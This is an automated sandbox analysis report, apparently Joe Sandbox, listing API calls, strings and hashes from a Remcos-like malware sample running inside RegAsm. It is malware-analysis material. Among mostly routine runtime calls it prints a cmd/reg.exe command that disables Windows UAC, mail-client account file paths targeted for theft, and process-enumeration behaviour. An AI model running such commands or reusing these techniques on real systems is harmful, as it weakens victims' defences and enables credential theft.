                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                                                  • API String ID: 2877667751-2410386613
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
• CloseHandle.KERNEL32(?), ref: 004077E5
• CloseHandle.KERNEL32(?), ref: 004077EA
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
• C:\Windows\System32\cmd.exe, xrefs: 004077D1
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
• GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
• FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
• FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: FreeHandleLibraryModule
• String ID: CorExitProcess$fYM/$mscoree.dll
• API String ID: 662261464-2800867290
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
• CloseHandle.KERNEL32(?), ref: 00405140
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
• Sleep.KERNEL32(00002710), ref: 0041AE98
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
• GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
• SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00449609
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• API String ID: 1286116820-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,P2), ref: 0041C08B
                                                                                                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,P2), ref: 0041C096
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2180151492-0
                                                                                                                                  • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                  • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                  • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00444106
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00444118
                                                                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                                                                  Memory Dump Source
